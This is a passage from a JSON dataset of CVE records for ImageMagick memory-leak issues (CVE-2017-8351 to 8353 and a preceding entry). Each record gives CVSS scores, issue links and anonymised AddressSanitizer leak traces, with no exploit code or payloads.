a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG b7d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14686. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14687. "severity": "MEDIUM",
  14688. "baseScore": 6.5,
  14689. "impactScore": 3.6,
  14690. "exploitabilityScore": 2.8
  14691. },
  14692. {
  14693. "CVE_ID": "CVE-2017-8351",
  14694. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/448",
  14695. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/448",
  14696. "Repo_new": "imagemagick/imagemagick",
  14697. "Issue_Created_At": "2017-04-26T16:46:15Z",
  14698. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fe NUMBERTAG ee0ab NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14699. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14700. "severity": "MEDIUM",
  14701. "baseScore": 6.5,
  14702. "impactScore": 3.6,
  14703. "exploitabilityScore": 2.8
  14704. },
  14705. {
  14706. "CVE_ID": "CVE-2017-8352",
  14707. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/452",
  14708. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/452",
  14709. "Repo_new": "imagemagick/imagemagick",
  14710. "Issue_Created_At": "2017-04-26T16:49:26Z",
  14711. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd2dbfdcb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd2d NUMBERTAG ebb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14712. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14713. "severity": "MEDIUM",
  14714. "baseScore": 6.5,
  14715. "impactScore": 3.6,
  14716. "exploitabilityScore": 2.8
  14717. },
  14718. {
  14719. "CVE_ID": "CVE-2017-8353",
  14720. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/454",
  14721. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/454",
  14722. "Repo_new": "imagemagick/imagemagick",
  14723. "Issue_Created_At": "2017-04-26T16:51:22Z",
  14724. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG cdb in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG b3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG b3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG c3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG 